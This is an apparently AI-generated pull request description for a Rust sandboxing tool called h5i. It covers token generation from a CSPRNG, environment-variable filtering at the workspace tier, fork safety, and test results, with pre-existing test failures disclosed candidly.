* Mint the console, viewer and proxy tokens from the OS CSPRNG. `fastrand` is explicitly not cryptographically secure, and the viewer token is persisted to disk. New `h5i-core::token`, which fails closed rather than falling back.
* Replace runtime `std::env::set_var`, unsound with threads and a side effect that outlived the call, with explicit `probe_host_fresh` / `capabilities_report_fresh`.
* **Behaviour change, worth a look:** `env_pass` is now enforced at the `workspace` tier. It is digested policy that `box status` reported as enforced, while captured runs and interactive sessions inherited the whole host environment. Background services at the same tier already applied it. Workspace-tier runs now get a filtered environment, which could surprise anyone relying on an inherited variable; say so and I will make the docs disclaim it instead.
* Make the post-fork mainline allocation-free. A heap allocation between `fork` and `execve` can deadlock on the malloc lock when the parent is threaded, which h5i's parents are.
* Pass the staged-path filter to `index.update_all` as well as `add_all`. Belt and braces, and stated as such: `add_all`'s pathspec already covers tracked entries today, so this closes no reachable hole. I originally reported it as a gap and it does not reproduce; the comment and test say so.
* Doc and test consistency: the `SecretGrant::inject` default, and a unit test that reassigned `HOME` process-wide beside tests that read it.

## Verification

| | result |
|---|---|
| clippy, both feature configurations | 0 warnings |
| lib tests | 407 pass |
| `console_api` | 8 pass |
| `env_integration` | 114 pass, 3 fail |
| man page and manual | regenerated, in sync |

The 3 integration failures are **pre-existing host drift** (in-box git `failed to stat .../work`), not regressions. Confirmed by stashing this branch and running the same three against the unmodified tree, where they fail identically.

New regression tests cover the SSRF shapes and the end-to-end no-connection property, the oversized `Content-Length`, the output deadlock, the confined wall clock, supervised signal reach and PID visibility, supervised egress under the pidns, and the workspace `env_pass` allowlist.

🤖 Generated with [Claude Code](https://claude.com/claude-code)